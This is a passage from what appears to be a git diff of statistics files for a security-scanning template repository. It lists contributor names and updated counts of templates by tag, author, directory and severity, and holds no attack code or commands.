(@palaziv)","count":1},{"name":"soyelmago","count":1},{"name":"noobexploiter","count":1},{"name":"0xd0ff9","count":1},{"name":"ptonewreckin","count":1},{"name":"manasmbellani","count":1},{"name":"aravind","count":1},{"name":"intx0x80","count":1},{"name":"x6263","count":1},{"name":"husain","count":1},{"name":"ola456","count":1},{"name":"regala_","count":1},{"name":"dievus","count":1},{"name":"elitebaz","count":1},{"name":"kiransau","count":1},{"name":"anon-artist","count":1},{"name":"zandros0","count":1},{"name":"osamahamad","count":1},{"name":"lingtren","count":1},{"name":"zy9ard3","count":1},{"name":"mass0ma","count":1},{"name":"d0rkerdevil","count":1},{"name":"mbmy","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"tehtbl","count":1},{"name":"daviey","count":1},{"name":"affix","count":1},{"name":"therealtoastycat","count":1},{"name":"co0nan","count":1},{"name":"ofjaaah","count":1},{"name":"mrharshvardhan","count":1},{"name":"naglis","count":1},{"name":"p-l-","count":1},{"name":"kailashbohara","count":1},{"name":"rojanrijal","count":1},{"name":"charanrayudu","count":1},{"name":"becivells","count":1},{"name":"carlosvieira","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"rschio","count":1},{"name":"udinchan","count":1},{"name":"jas37","count":1},{"name":"ramondunker","count":1},{"name":"push4d","count":1},{"name":"florianmaak","count":1},{"name":"shifacyclewla","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"kagamigawa","count":1},{"name":"hanlaomo","count":1},{"name":"am0nt31r0","count":1},{"name":"udyz","count":1},{"name":"shockwave","count":1},{"name":"marcio mendes","count":1},{"name":"kaizensecurity","count":1},{"name":"sak1","count":1},{"name":"davidfegyver","count":1},{"name":"ayadim","count":1},{"name":"bywalks","count":1},{"name":"bjhulst","count":1},{"name":"oscarintherocks","count":1},{"name":"b0rn2r00t","count":1},{"name":"nielsing","count":1},{"name":"pdp","count":1},{"name":"bugvsme","count":1},{"name":"omarjezi","count":1},{"name":"0xtavian","count":1},{"name":"alexrydzak","count":1},{"name":"philippdelteil","count":1},{"name":"narluin","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"phyr3wall","count":1},{"name":"sinsinology","count":1},{"name":"supr4s","count":1},{"name":"noamrathaus","count":1},{"name":"arjunchandarana","count":1},{"name":"notsoevilweasel","count":1},{"name":"jbertman","count":1},{"name":"shiar","count":1},{"name":"chesterblue","count":1},{"name":"hexcat","count":1},{"name":"opencirt","count":1},{"name":"shreyapohekar","count":1},{"name":"unkl4b","count":1},{"name":"0h1in9e","count":1},{"name":"_harleo","count":1},{"name":"piyushchhiroliya","count":1},{"name":"0xceba","count":1},{"name":"keni0k","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dale clarke","count":1},{"name":"couskito","count":1},{"name":"aaronchen0","count":1},{"name":"booboohq","count":1},{"name":"jna1","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"1nf1n7y","count":1},{"name":"fq_hsu","count":1},{"name":"failopen","count":1},{"name":"infosecsanyam","count":1},{"name":"dawid-czarnecki","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"mesaglio","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"marcos_iaf","count":1},{"name":"lrtk-coder","count":1},{"name":"0xh7ml","count":1},{"name":"ahmed sherif","count":1},{"name":"rubina119","count":1},{"name":"mr. bobo hp","count":1},{"name":"qlkwej","count":1},{"name":"xshuden","count":1},{"name":"lamscun","count":1},{"name":"mrcl0wnlab","count":1},{"name":"sickwell","count":1},{"name":"th3r4id","count":1},{"name":"ok_bye_now","count":1},{"name":"micha3lb3n","count":1},{"name":"elouhi","count":1},{"name":"akokonunes","count":1},{"name":"aringo","count":1},{"name":"dwbzn","count":1},{"name":"ransomsec","count":1},{"name":"ringo","count":1},{"name":"adrianmf","count":1},{"name":"arall","count":1},{"name":"apt-mirror","count":1},{"name":"sherlocksecurity","count":1},{"name":"revblock","count":1},{"name":"dabla","count":1},{"name":"orpheus","count":1},{"name":"alevsk","count":1},{"name":"nuts7","count":1},{"name":"prettyboyaaditya","count":1},{"name":"knassar702","count":1},{"name":"jaskaran","count":1},{"name":"aayush vishnoi","count":1},{"name":"galoget","count":1},{"name":"houdinis","count":1},{"name":"xstp","count":1},{"name":"bartu utku sarp","count":1},{"name":"erethon","count":1},{"name":"paper-pen","count":1},{"name":"mantissts","count":1},{"name":"ph33rr","count":1},{"name":"iampritam","count":1},{"name":"retr0","count":1},{"name":"igibanez","count":1},{"name":"palanichamy_perumal","count":1},{"name":"danigoland","count":1},{"name":"nagli","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"mariam tariq","count":1},{"name":"2rs3c","count":1},{"name":"jaimin gondaliya","count":1},{"name":"andirrahmani1","count":1},{"name":"r3nz0","count":1},{"name":"harshinsecurity","count":1},{"name":"arliya","count":1},{"name":"ramkrishna sawant","count":1},{"name":"0xceeb","count":1},{"name":"jrolf","count":1},{"name":"tirtha","count":1},{"name":"calumjelrick","count":1},{"name":"y0no","count":1},{"name":"ooooooo_q","count":1},{"name":"ndmalc","count":1},{"name":"_c0wb0y_","count":1},{"name":"amnotacat","count":1},{"name":"shiva (strobes security)","count":1},{"name":"lixts","count":1},{"name":"h4kux","count":1},{"name":"brabbit10","count":1},{"name":"stupidfish","count":1},{"name":"sicksec","count":1},{"name":"ilovebinbash","count":1},{"name":"8authur","count":1},{"name":"jiheon-dev","count":1},{"name":"zhenwarx","count":1},{"name":"schniggie","count":1},{"name":"justmumu","count":1},{"name":"duty_1g","count":1},{"name":"myst7ic","count":1},{"name":"guax1","count":1},{"name":"whynotke","count":1},{"name":"juliosmelo","count":1},{"name":"viniciuspereiras","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"ahmed abou-ela","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"pudsec","count":1},{"name":"droberson","count":1},{"name":"vzamanillo","count":1},{"name":"liquidsec","count":1},{"name":"irshadahamed","count":1},{"name":"patralos","count":1},{"name":"mubassirpatel","count":1},{"name":"flag007","count":1},{"name":"imhunterand","count":1},{"name":"kr1shna4garwal","count":1},{"name":"j33n1k4","count":1},{"name":"hardik-rathod","count":1},{"name":"dmartyn","count":1},{"name":"exid","count":1},{"name":"pascalheidmann","count":1},{"name":"skylark-lab","count":1},{"name":"topscoder","count":1},{"name":"arr0way","count":1},{"name":"toufik-airane","count":1},{"name":"breno_css","count":1},{"name":"barthy.koeln","count":1},{"name":"blckraven","count":1},{"name":"jeya seelan","count":1},{"name":"michael wedl","count":1},{"name":"jc175","count":1},{"name":"rodnt","count":1},{"name":"f1she3","count":1},{"name":"wlayzz","count":1},{"name":"shivampand3y","count":1},{"name":"francescocarlucci","count":1},{"name":"lark lab","count":1},{"name":"metascan","count":1},{"name":"hazana","count":1},{"name":"iphantasmic","count":1},{"name":"official_blackhat13","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"omarkurt","count":1},{"name":"colbyjack1134","count":1},{"name":"jub0bs","count":1},{"name":"5up3r541y4n","count":1},{"name":"httpvoid","count":1},{"name":"thelicato","count":1},{"name":"daffianfo","count":1},{"name":"queencitycyber","count":1},{"name":"xeldax","count":1},{"name":"zeyad azima","count":1},{"name":"kurohost","count":1},{"name":"zinminphy0","count":1},{"name":"petruknisme","count":1},{"name":"lethargynavigator","count":1},{"name":"higor melgaço","count":1},{"name":"jteles","count":1},{"name":"freakyclown","count":1},{"name":"kchason","count":1},{"name":"realexp3rt","count":1},{"name":"makyotox","count":1},{"name":"exceed","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"unp4ck","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ahmetpergamum","count":1},{"name":"mukundbhuva","count":1},{"name":"izn0u","count":1},{"name":"natto97","count":1},{"name":"vinit989","count":1},{"name":"carrot2","count":1},{"name":"retr02332","count":1},{"name":"undefl0w","count":1},{"name":"pratik khalane","count":1},{"name":"deena","count":1},{"name":"cookiehanhoan","count":1},{"name":"jeya.seelan","count":1},{"name":"open-sec","count":1},{"name":"mah3sec_","count":1},{"name":"patrick pirker","count":1},{"name":"mihhailsokolov","count":1},{"name":"andysvints","count":1},{"name":"nobody","count":1},{"name":"manuelbua","count":1},{"name":"miryangjung","count":1},{"name":"berkdusunur","count":1},{"name":"majidmc2","count":1},{"name":"b0yd","count":1},{"name":"af001","count":1},{"name":"rotembar","count":1},{"name":"juicypotato1","count":1},{"name":"sleepingbag945","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"0xrod","count":1},{"name":"alex","count":1},{"name":"viondexd","count":1},{"name":"geraldino2","count":1},{"name":"amanrawat","count":1},{"name":"luqmaan hadia","count":1},{"name":"hczdmr","count":1},{"name":"dk999","count":1},{"name":"sshell","count":1},{"name":"hakluke","count":1},{"name":"clment cruchet","count":1},{"name":"jbaines-r7","count":1},{"name":"compr00t","count":1},{"name":"miroslavsotak","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"act1on3","count":1},{"name":"0ut0fb4nd","count":1},{"name":"evolutionsec","count":1},{"name":"mzack9999","count":1},{"name":"rivalsec","count":1},{"name":"mabdullah22","count":1},{"name":"screamy","count":1},{"name":"tea","count":1},{"name":"willd96","count":1},{"name":"secthebit","count":1},{"name":"djoevanka","count":1},{"name":"exploitation","count":1},{"name":"ling","count":1},{"name":"fmunozs","count":1},{"name":"bad5ect0r","count":1},{"name":"hakimkt","count":1},{"name":"th3.d1p4k","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"yashgoti","count":1},{"name":"luqman","count":1},{"name":"mhdsamx","count":1},{"name":"aresx","count":1},{"name":"nerrorsec","count":1},{"name":"s1r1u5_","count":1},{"name":"caon","count":1},{"name":"evan rubinstien","count":1},{"name":"spac3wh1te","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"pry0cc","count":1},{"name":"sec_hawk","count":1},{"name":"yavolo","count":1},{"name":"esonhugh","count":1},{"name":"nytr0gen","count":1},{"name":"dhiyaneshdki","count":1},{"name":"allenwest24","count":1},{"name":"jcockhren","count":1},{"name":"un-fmunozs","count":1},{"name":"petergrifin","count":1},{"name":"luskabol","count":1},{"name":"furkansayim","count":1},{"name":"pjborah","count":1},{"name":"kiks7","count":1},{"name":"yuansec","count":1},{"name":"rotemreiss","count":1},{"name":"xcapri","count":1},{"name":"w0tx","count":1},{"name":"thebinitghimire","count":1},{"name":"gpiechnik2","count":1},{"name":"akash.c","count":1},{"name":"momen eldawakhly","count":1},{"name":"elder tao","count":1},{"name":"alperenkesk","count":1},{"name":"shelld3v","count":1},{"name":"tirtha_mandal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"_darrenmartyn","count":1},{"name":"dali","count":1},{"name":"jonathanwalker","count":1},{"name":"b4uh0lz","count":1},{"name":"thevillagehacker","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"tarunkoyalwar","count":1},{"name":"ynnirc","count":1},{"name":"remonsec","count":1},{"name":"zsusac","count":1}],"directory":[{"name":"http","count":6047},{"name":"workflows","count":190},{"name":"file","count":142},{"name":"network","count":100},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":2940},{"name":"high","count":1312},{"name":"medium","count":1113},{"name":"critical","count":724},{"name":"low","count":224},{"name":"unknown","count":27}],"types":[{"name":"file","count":142},{"name":"dns","count":18}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7d16691de6..4f78107c8a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,3450 +1,3493 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | +| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | +| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | +| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | cves.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | TEMPLATES-STATS.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | contributors.json | 1 | | | | | -| cve2021 | 434 | theamanrawat | 166 | | | | | | | -| rce | 427 | princechaddha | 156 | | | | | | | -| cve2022 | 401 | gy741 | 144 | | | | | | | -| packetstorm | 369 | arafatansari | 119 | | | | | | | -| wpscan | 348 | tess | 109 | | | | | | | -| misconfig | 305 | madrobot | 65 | | | | | | | -| wp | 291 | zzeitlin | 64 | | | | | | | -| unauth | 272 | idealphase | 63 | | | | | | | +| tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | +| lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | +| misconfig | 474 | theamanrawat | 177 | | | | | | | +| cve2021 | 434 | princechaddha | 156 | | | | | | | +| rce | 430 | gy741 | 145 | | | | | | | +| cve2022 | 417 | arafatansari | 119 | | | | | | | +| packetstorm | 369 | tess | 109 | | | | | | | +| wpscan | 350 | r3y3r53 | 80 | | | | | | | +| wp | 303 | madrobot | 65 | | | | | | | +| unauth | 285 | zzeitlin | 64 | | | | | | | +| cve2020 | 242 | idealphase | 63 | | | | | | | | token-spray | 240 | akincibor | 58 | | | | | | | -| cve2020 | 237 | for3stco1d | 55 | | | | | | | -| top-200 | 208 | r3y3r53 | 51 | | | | | | | -| osint-social | 207 | gaurang | 42 | | | | | | | -| authenticated | 204 | righettod | 41 | | | | | | | -| sqli | 203 | philippedelteil | 41 | | | | | | | +| authenticated | 233 | for3stco1d | 55 | | | | | | | +| sqli | 210 | gaurang | 42 | | | | | | | +| top-200 | 208 | philippedelteil | 41 | | | | | | | +| osint-social | 207 | righettod | 41 | | | | | | | | kev | 200 | edoardottt | 40 | | | | | | | -| config | 195 | pdresearch | 39 | | | | | | | +| config | 197 | pdresearch | 39 | | | | | | | | | 194 | c-sh0 | 35 | | | | | | | -| oast | 169 | adam crosser | 31 | | | | | | | -| token | 157 | iamnoooob | 29 | | | | | | | -| apache | 151 | rootxharsh | 28 | | | | | | | -| cve2018 | 150 | ice3man | 26 | | | | | | | -| iot | 149 | hardik-solanki | 24 | | | | | | | -| cve2019 | 148 | pwnhxl | 24 | | | | | | | -| default-login | 147 | organiccrap | 24 | | | | | | | -| joomla | 136 | techbrunchfr | 23 | | | | | | | -| file | 135 | johnk3r | 23 | | | | | | | -| login | 130 | ffffffff0x | 22 | | | | | | | -| redirect | 115 | j4vaovo | 20 | | | | | | | -| cve2010 | 112 | sullo | 18 | | | | | | | -| top-100 | 100 | cckuailong | 18 | | | | | | | -| files | 100 | parthmalhotra | 16 | | | | | | | -| cve2023 | 99 | sheikhrishad | 15 | | | | | | | -| router | 97 | ctflearner | 15 | | | | | | | -| network | 96 | random-robbie | 15 | | | | | | | -| ssrf | 96 | pr3r00t | 15 | | | | | | | -| cms | 95 | milo2012 | 14 | | | | | | | -| auth-bypass | 79 | r3dg33k | 14 | | | | | | | -| cve2017 | 77 | theabhinavgaur | 13 | | | | | | | +| oast | 171 | adam crosser | 31 | | | | | | | +| token | 160 | iamnoooob | 29 | | | | | | | +| apache | 153 | rootxharsh | 28 | | | | | | | +| cve2018 | 151 | ice3man | 26 | | | | | | | +| default-login | 150 | hardik-solanki | 24 | | | | | | | +| iot | 150 | organiccrap | 24 | | | | | | | +| cve2019 | 149 | pwnhxl | 24 | | | | | | | +| file | 147 | johnk3r | 23 | | | | | | | +| login | 140 | techbrunchfr | 23 | | | | | | | +| joomla | 136 | j4vaovo | 22 | | | | | | | +| redirect | 116 | ffffffff0x | 22 | | | | | | | +| cve2023 | 116 | sullo | 18 | | | | | | | +| cve2010 | 112 | cckuailong | 18 | | | | | | | +| files | 101 | ctflearner | 16 | | | | | | | +| network | 100 | parthmalhotra | 16 | | | | | | | +| top-100 | 100 | lu4nx | 15 | | | | | | | +| router | 97 | pr3r00t | 15 | | | | | | | +| ssrf | 96 | random-robbie | 15 | | | | | | | +| cms | 95 | sheikhrishad | 15 | | | | | | | +| auth-bypass | 81 | milo2012 | 14 | | | | | | | +| cve2017 | 77 | r3dg33k | 14 | | | | | | | | devops | 77 | tenbird | 13 | | | | | | | -| takeover | 73 | melbadry9 | 13 | | | | | | | +| takeover | 73 | theabhinavgaur | 13 | | | | | | | | intrusive | 72 | 0ri2n | 13 | | | | | | | | install | 70 | sharath | 13 | | | | | | | -| disclosure | 68 | suman_kar | 12 | | | | | | | -| oracle | 65 | lu4nx | 12 | | | | | | | +| disclosure | 68 | melbadry9 | 13 | | | | | | | +| oracle | 65 | suman_kar | 12 | | | | | | | | seclists | 60 | elsfa7110 | 11 | | | | | | | -| oss | 57 | dogasantos | 11 | | | | | | | -| cve2015 | 54 | wdahlenb | 11 | | | | | | | -| cisco | 53 | cyllective | 11 | | | | | | | -| google | 53 | logicalhunter | 10 | | | | | | | -| cve2016 | 52 | hackergautam | 10 | | | | | | | -| detect | 51 | nadino | 10 | | | | | | | -| adobe | 50 | alph4byt3 | 10 | | | | | | | -| fileupload | 50 | meme-lord | 10 | | | | | | | -| logs | 46 | random_robbie | 10 | | | | | | | -| tenable | 46 | co5mos | 10 | | | | | | | -| osint-gaming | 45 | emadshanab | 9 | | | | | | | -| vmware | 45 | nullfuzz | 9 | | | | | | | -| atlassian | 45 | 0xpugazh | 9 | | | | | | | -| debug | 44 | fabaff | 9 | | | | | | | -| aem | 44 | 0x240x23elu | 9 | | | | | | | -| vulhub | 44 | oppsec | 9 | | | | | | | -| plugin | 43 | veshraj | 8 | | | | | | | -| cve2014 | 42 | aashiq | 8 | | | | | | | -| osint-porn | 42 | olearycrew | 8 | | | | | | | -| osint-hobby | 42 | iamthefrogy | 8 | | | | | | | -| hackerone | 42 | harsh | 8 | | | | | | | -| huntr | 40 | zh | 8 | | | | | | | -| traversal | 37 | _0xf4n9x_ | 8 | | | | | | | +| detect | 58 | cyllective | 11 | | | | | | | +| oss | 57 | wdahlenb | 11 | | | | | | | +| cve2015 | 54 | dogasantos | 11 | | | | | | | +| cisco | 53 | random_robbie | 10 | | | | | | | +| google | 53 | 0xpugazh | 10 | | | | | | | +| cve2016 | 52 | logicalhunter | 10 | | | | | | | +| adobe | 52 | co5mos | 10 | | | | | | | +| fileupload | 49 | alph4byt3 | 10 | | | | | | | +| atlassian | 47 | meme-lord | 10 | | | | | | | +| logs | 46 | nadino | 10 | | | | | | | +| tenable | 46 | hackergautam | 10 | | | | | | | +| vmware | 45 | harsh | 9 | | | | | | | +| osint-gaming | 45 | 0x240x23elu | 9 | | | | | | | +| vulhub | 44 | emadshanab | 9 | | | | | | | +| aem | 44 | nullfuzz | 9 | | | | | | | +| debug | 44 | oppsec | 9 | | | | | | | +| plugin | 43 | fabaff | 9 | | | | | | | +| osint-porn | 42 | _0xf4n9x_ | 8 | | | | | | | +| osint-hobby | 42 | olearycrew | 8 | | | | | | | +| hackerone | 42 | aashiq | 8 | | | | | | | +| cve2014 | 42 | veshraj | 8 | | | | | | | +| huntr | 41 | zh | 8 | | | | | | | | generic | 37 | that_juan_ | 8 | | | | | | | -| jira | 36 | caspergn | 7 | | | | | | | -| springboot | 36 | techryptic (@tech) | 7 | | | | | | | -| osint-misc | 35 | amit-jd | 7 | | | | | | | -| aws | 35 | harshbothra_ | 7 | | | | | | | -| kubernetes | 35 | randomstr1ng | 7 | | | | | | | -| injection | 34 | kophjager007 | 7 | | | | | | | -| listing | 33 | leovalcante | 7 | | | | | | | -| deserialization | 31 | its0x08 | 7 | | | | | | | -| sap | 29 | divya_mudgal | 7 | | | | | | | -| osint-coding | 29 | dr_set | 7 | | | | | | | -| osint-tech | 28 | adamcrosser | 7 | | | | | | | -| log4j | 28 | me_dheeraj | 7 | | | | | | | +| traversal | 37 | iamthefrogy | 8 | | | | | | | +| springboot | 36 | kophjager007 | 7 | | | | | | | +| jira | 36 | techryptic (@tech) | 7 | | | | | | | +| osint-misc | 35 | divya_mudgal | 7 | | | | | | | +| kubernetes | 35 | its0x08 | 7 | | | | | | | +| aws | 35 | dr_set | 7 | | | | | | | +| injection | 34 | leovalcante | 7 | | | | | | | +| listing | 33 | adamcrosser | 7 | | | | | | | +| misc | 31 | amit-jd | 7 | | | | | | | +| deserialization | 31 | harshbothra_ | 7 | | | | | | | +| cnvd | 29 | randomstr1ng | 7 | | | | | | | +| sap | 29 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| cnvd | 28 | forgedhallpass | 6 | | | | | | | -| gitlab | 27 | pentest_swissky | 6 | | | | | | | -| misc | 26 | puzzlepeaches | 6 | | | | | | | -| php | 26 | xelkomy | 6 | | | | | | | -| microsoft | 26 | ja1sh | 6 | | | | | | | -| fuzz | 25 | justaacat | 6 | | | | | | | -| jndi | 25 | imnightmaree | 6 | | | | | | | -| proxy | 25 | clem9669 | 6 | | | | | | | -| firewall | 24 | evan rubinstein | 6 | | | | | | | +| osint-coding | 29 | caspergn | 7 | | | | | | | +| log4j | 28 | clem9669 | 6 | | | | | | | +| osint-tech | 28 | imnightmaree | 6 | | | | | | | +| gitlab | 27 | forgedhallpass | 6 | | | | | | | +| php | 27 | pathtaga | 6 | | | | | | | +| microsoft | 26 | pentest_swissky | 6 | | | | | | | +| proxy | 26 | praetorian-thendrickson | 6 | | | | | | | +| fuzz | 25 | evan rubinstein | 6 | | | | | | | +| cve2012 | 25 | puzzlepeaches | 6 | | | | | | | +| api | 25 | justaacat | 6 | | | | | | | +| jndi | 25 | noraj | 6 | | | | | | | +| osint-business | 24 | ja1sh | 6 | | | | | | | +| osint-images | 24 | xelkomy | 6 | | | | | | | | osint-shopping | 24 | gitlab red team | 6 | | | | | | | -| osint-images | 24 | nodauf | 6 | | | | | | | -| api | 24 | pathtaga | 6 | | | | | | | -| cve2012 | 24 | devang-solanki | 6 | | | | | | | -| osint-finance | 24 | praetorian-thendrickson | 6 | | | | | | | -| manageengine | 24 | __fazal | 6 | | | | | | | -| osint-business | 24 | robotshell | 5 | | | | | | | -| zoho | 23 | prajiteshsingh | 5 | | | | | | | -| k8s | 23 | vicrack | 5 | | | | | | | -| amazon | 23 | kh4sh3i | 5 | | | | | | | -| wp-theme | 22 | r12w4n | 5 | | | | | | | -| ibm | 21 | joanbono | 5 | | | | | | | -| cloud | 21 | yanyun | 5 | | | | | | | -| tomcat | 21 | ganofins | 5 | | | | | | | -| c2 | 21 | s0obi | 5 | | | | | | | -| msf | 21 | defr0ggy | 5 | | | | | | | -| weblogic | 21 | panch0r3d | 5 | | | | | | | -| cicd | 20 | mr-xn | 5 | | | | | | | -| fortinet | 20 | podalirius | 5 | | | | | | | -| camera | 19 | h1ei1 | 4 | | | | | | | -| dlink | 19 | tanq16 | 4 | | | | | | | -| github | 19 | r3naissance | 4 | | | | | | | -| ssl | 19 | dadevel | 4 | | | | | | | -| jenkins | 19 | 3th1c_yuk1 | 4 | | | | | | | -| struts | 19 | dolev farhi | 4 | | | | | | | -| dns | 19 | powerexploit | 4 | | | | | | | -| service | 18 | scent2d | 4 | | | | | | | +| manageengine | 24 | nodauf | 6 | | | | | | | +| osint-finance | 24 | devang-solanki | 6 | | | | | | | +| firewall | 24 | __fazal | 6 | | | | | | | +| k8s | 23 | r12w4n | 5 | | | | | | | +| stored-xss | 23 | ganofins | 5 | | | | | | | +| zoho | 23 | panch0r3d | 5 | | | | | | | +| c2 | 23 | vicrack | 5 | | | | | | | +| amazon | 23 | defr0ggy | 5 | | | | | | | +| wp-theme | 22 | kh4sh3i | 5 | | | | | | | +| ibm | 21 | prajiteshsingh | 5 | | | | | | | +| msf | 21 | yanyun | 5 | | | | | | | +| weblogic | 21 | irshad ahamed | 5 | | | | | | | +| cloud | 21 | joanbono | 5 | | | | | | | +| tomcat | 21 | robotshell | 5 | | | | | | | +| fortinet | 20 | mr-xn | 5 | | | | | | | +| cicd | 20 | podalirius | 5 | | | | | | | +| struts | 19 | s0obi | 5 | | | | | | | +| ssl | 19 | incogbyte | 4 | | | | | | | +| admin | 19 | tanq16 | 4 | | | | | | | +| github | 19 | kazet | 4 | | | | | | | +| dlink | 19 | dadevel | 4 | | | | | | | +| camera | 19 | bhutch | 4 | | | | | | | +| dns | 19 | dolev farhi | 4 | | | | | | | +| jenkins | 19 | powerexploit | 4 | | | | | | | +| rukovoditel | 19 | r3naissance | 4 | | | | | | | | lfr | 18 | wisnupramoedya | 4 | | | | | | | -| ftp | 18 | e_schultze_ | 4 | | | | | | | -| admin | 18 | incogbyte | 4 | | | | | | | | osint-music | 18 | shine | 4 | | | | | | | -| wavlink | 18 | yash anand @yashanand155 | 3 | | | | | | | -| ir | 17 | k0pak4 | 3 | | | | | | | -| cve2011 | 17 | sushantkamble | 3 | | | | | | | -| osint-blog | 16 | alifathi-h1 | 3 | | | | | | | -| nginx | 16 | huowuzhao | 3 | | | | | | | -| cve2009 | 16 | f1tz | 3 | | | | | | | -| printer | 16 | jarijaas | 3 | | | | | | | -| xxe | 16 | kazet | 3 | | | | | | | -| backup | 16 | true13 | 3 | | | | | | | -| status | 15 | binaryfigments | 3 | | | | | | | -| cve2008 | 15 | swissky | 3 | | | | | | | -| android | 15 | ambassify | 3 | | | | | | | -| hp | 15 | vsh00t | 3 | | | | | | | -| citrix | 15 | fyoorer | 3 | | | | | | | -| magento | 15 | lucasljm2001 | 3 | | | | | | | -| osint-art | 14 | unstabl3 | 3 | | | | | | | -| zyxel | 14 | johnjhacking | 3 | | | | | | | -| jboss | 14 | me9187 | 3 | | | | | | | -| cve2013 | 14 | thomas_from_offensity | 3 | | | | | | | -| woocommerce | 14 | badboycxcc | 3 | | | | | | | +| service | 18 | scent2d | 4 | | | | | | | +| ftp | 18 | 3th1c_yuk1 | 4 | | | | | | | +| wavlink | 18 | e_schultze_ | 4 | | | | | | | +| cve2011 | 17 | mastercho | 4 | | | | | | | +| ir | 17 | h1ei1 | 4 | | | | | | | +| printer | 16 | impramodsargar | 3 | | | | | | | +| nginx | 16 | 0w4ys | 3 | | | | | | | +| osint-blog | 16 | f1tz | 3 | | | | | | | +| backup | 16 | mavericknerd | 3 | | | | | | | +| xxe | 16 | ph33r | 3 | | | | | | | +| cve2009 | 16 | huowuzhao | 3 | | | | | | | +| android | 15 | taielab | 3 | | | | | | | +| magento | 15 | hahwul | 3 | | | | | | | +| citrix | 15 | johnjhacking | 3 | | | | | | | +| java | 15 | skeltavik | 3 | | | | | | | +| status | 15 | evergreencartoons | 3 | | | | | | | +| cve2008 | 15 | canberbamber | 3 | | | | | | | +| hp | 15 | sushantkamble | 3 | | | | | | | +| jboss | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| confluence | 14 | jarijaas | 3 | | | | | | | +| woocommerce | 14 | _generic_human_ | 3 | | | | | | | +| audit | 14 | k0pak4 | 3 | | | | | | | | nodejs | 14 | matt galligan | 3 | | | | | | | -| domainmod | 14 | 0w4ys | 3 | | | | | | | -| osint-health | 14 | bhutch | 3 | | | | | | | -| java | 14 | lark-lab | 3 | | | | | | | -| confluence | 14 | z3bd | 3 | | | | | | | -| mail | 14 | dudez | 3 | | | | | | | -| audit | 14 | splint3r7 | 3 | | | | | | | -| laravel | 13 | canberbamber | 3 | | | | | | | -| abstractapi | 13 | ekrause | 3 | | | | | | | -| creds-stuffing | 13 | davidmckennirey | 3 | | | | | | | -| fortigate | 13 | hahwul | 3 | | | | | | | -| cuppa | 13 | mastercho | 3 | | | | | | | -| osint-dating | 13 | shifacyclewala | 3 | | | | | | | -| login-check | 13 | taielab | 3 | | | | | | | -| osint-political | 13 | whoever | 3 | | | | | | | -| azure | 13 | _generic_human_ | 3 | | | | | | | -| dashboard | 12 | cheesymoon | 3 | | | | | | | -| auth | 12 | atomiczsec | 3 | | | | | | | -| microweber | 12 | mavericknerd | 3 | | | | | | | -| kafka | 12 | andydoering | 3 | | | | | | | -| rails | 12 | evergreencartoons | 3 | | | | | | | -| git | 12 | bernardofsr | 3 | | | | | | | -| netsweeper | 12 | vagnerd | 3 | | | | | | | -| drupal | 12 | ph33r | 3 | | | | | | | -| enum | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| grafana | 12 | arcc | 3 | | | | | | | -| vpn | 12 | arm!tage | 3 | | | | | | | -| webserver | 12 | skeltavik | 3 | | | | | | | -| backdoor | 12 | emenalf | 3 | | | | | | | -| ruby | 12 | fxploit | 3 | | | | | | | -| netgear | 12 | dr0pd34d | 3 | | | | | | | -| graphql | 12 | impramodsargar | 3 | | | | | | | -| airflow | 12 | 